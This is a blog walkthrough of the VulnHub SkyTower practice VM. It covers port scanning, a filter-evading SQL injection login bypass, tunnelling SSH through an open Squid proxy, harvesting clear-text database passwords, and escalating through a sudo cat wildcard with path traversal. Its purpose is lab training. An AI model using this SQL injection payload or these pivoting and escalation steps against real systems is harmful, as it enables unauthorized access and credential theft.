SkyTower

Setup

Attacker(kali):192.168.146.128

VulnHub Link:https://www.vulnhub.com/entry/skytower-1,96/

VM Network:NAT

Enumeration

Host Enumeration

Use the arp-scan to find the vm's IP address: sudo arp-scan -l

Get the BOX's IP :192.168.146.136

Port Enumeration

Port enumeration with nmap: nmap -T4 -sV -sC -oN nmap.txt 192.168.146.136

Nmap scan report for 192.168.146.136
Host is up (0.0013s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.20

according to the scan result, i got some infomation below:

22 ssh is filtered
80 http is a website here
3128 is a http-proxy port

HTTP Enumeration

Use dirsearch to perform a directory enumeration:

dirsearch -u http://192.168.146.136 -x 400-599 -t 100 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

nothing special here, check the website in browser, first is the port 80:

it's a login page, i could burte password or test sqli then.

Foothold

test the port 80 with password-brute and sqli, then i got a sqli here, and it came out with the ssh username and password.

sqli payload: a'oorr 1=1#

the user info:

Username: john
Password: hereisjohn

But in the previous port scan results I mentioned that port 22 is filtered, so I can't make a ssh connection directly.

oh, did I forget that there is also a proxy port 3128? Just configure the proxychains with it so that I can get in touch with the SSH port 22 through the proxy.

add it to the proxychains4.conf:

ssh the target with proxychains:

It worked! Now i've got a foothold.

Privilege Escalation

Since the web page was using MySQL, I went to the /var/www/ path to check if there was anything useful, like the MySQL password.

Easily, i got the MySQL userinfo root:root:

Authenticating into MySQL:

Listing the available databases, selecting SkyTech, listing tables and finding some clear-text passwords:

The userinfo i got:

john:hereisjohn
sara:ihatethisjob
william:senseable

Login the ssh with those accounts, i've got the john access, so just test the sara and william account, then i found the sara could login successful:

(the william login failed)

Check the sara's sudo -l:

It appears that the sara user can execute the cat command against all files in the /accounts directory.

But there is a small problem, the path is /accounts/*, since that * i cloud use ../ to read all files. This could be used in a number of way to potentially achieved root-level access, then i got the root password in the /root/flag.txt:

Got the root access successfully.

Key Learnings From this BOX

  • During SQL injection, it is necessary to modify the injection statement based on the prompt message in order to successfully bypass it.
  • After obtaining the SSH password, if it's discovered that direct connection to the SSH port is not possible, it is advisable to check if there are any proxy services available for utilization.
  • After gaining shell access, if there are SQL data operations on the web side, remember to navigate to the web directory and examine the configuration files to find the database information.
文章作者: z0sen
版权声明: 本站所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 z0sen's Blog
Walkthrough Linux VulnHub
喜欢就支持一下吧